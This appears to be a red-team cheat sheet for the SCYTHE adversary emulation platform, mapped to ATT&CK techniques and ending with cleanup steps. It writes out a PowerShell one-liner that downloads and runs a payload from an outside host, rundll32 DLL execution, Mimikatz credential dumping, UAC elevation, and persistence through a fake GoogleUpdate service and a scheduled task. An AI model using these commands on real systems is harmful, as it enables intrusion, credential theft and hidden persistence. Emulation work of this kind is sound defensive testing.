SCYTHE

Setup Campaign
Login to your SCYTHE instance via web browser. Default port is 8443.
​https://localhost:8443​
Campaign Manager - New Campaign
Select the following options:
Name: unique name for the campaign
Target Operating System: Windows, Linux, or macOS
Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date
Communication Module: 
HTTPS is default, 
DNS, HTTP, and Stego require relays to be installed on redirector
Google Sheet and Twitter require third party account/API
Community Threats (Third Party Adversary Emulation Plans)
Download Community Threats from SCYTHE Github: https://github.com/scythe-io/community-threats​
Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import
Migrate Threats
Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat
Deploy Payload
User Execution: Malicious File (T1204.002):
Download the binary to the target system and execute by double clicking.
Signed Binary Proxy Execution: Rundll32 (T1218.011): 
Download DLL file from SCYTHE and execute below from a cmd.exe:
rundll32.exe ServiceLogin.dll,PlatformClientMain
Command and Scripting Interpreter: PowerShell (T1059.001)
Open a powershell.exe and run:
$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;
Emulate TTPs
loader --load run
run whoami
run cmd /c whoami
Load Python Runtime
loader --load-runtime python3
list modules
loader --load "modulename"
"modulename" 
Download files
Move file to virtual file system
loader --load downloader 
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll
Privilege Escalation (TA0004)
UAC (T1088)
loader --load elevate 
elevate --prompt
Credential Access (TA0006)
Credential Dumping (T1003)
loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords
Persistence (TA0003)
New Service (T1050)
loader --load persist 
​
Synatax: 
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"
​
Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe
Scheduled Task (T1168)
schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"
Clean up
Persistence:
run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe
Kill agent:
controller --shutdown

Last modified 2yr ago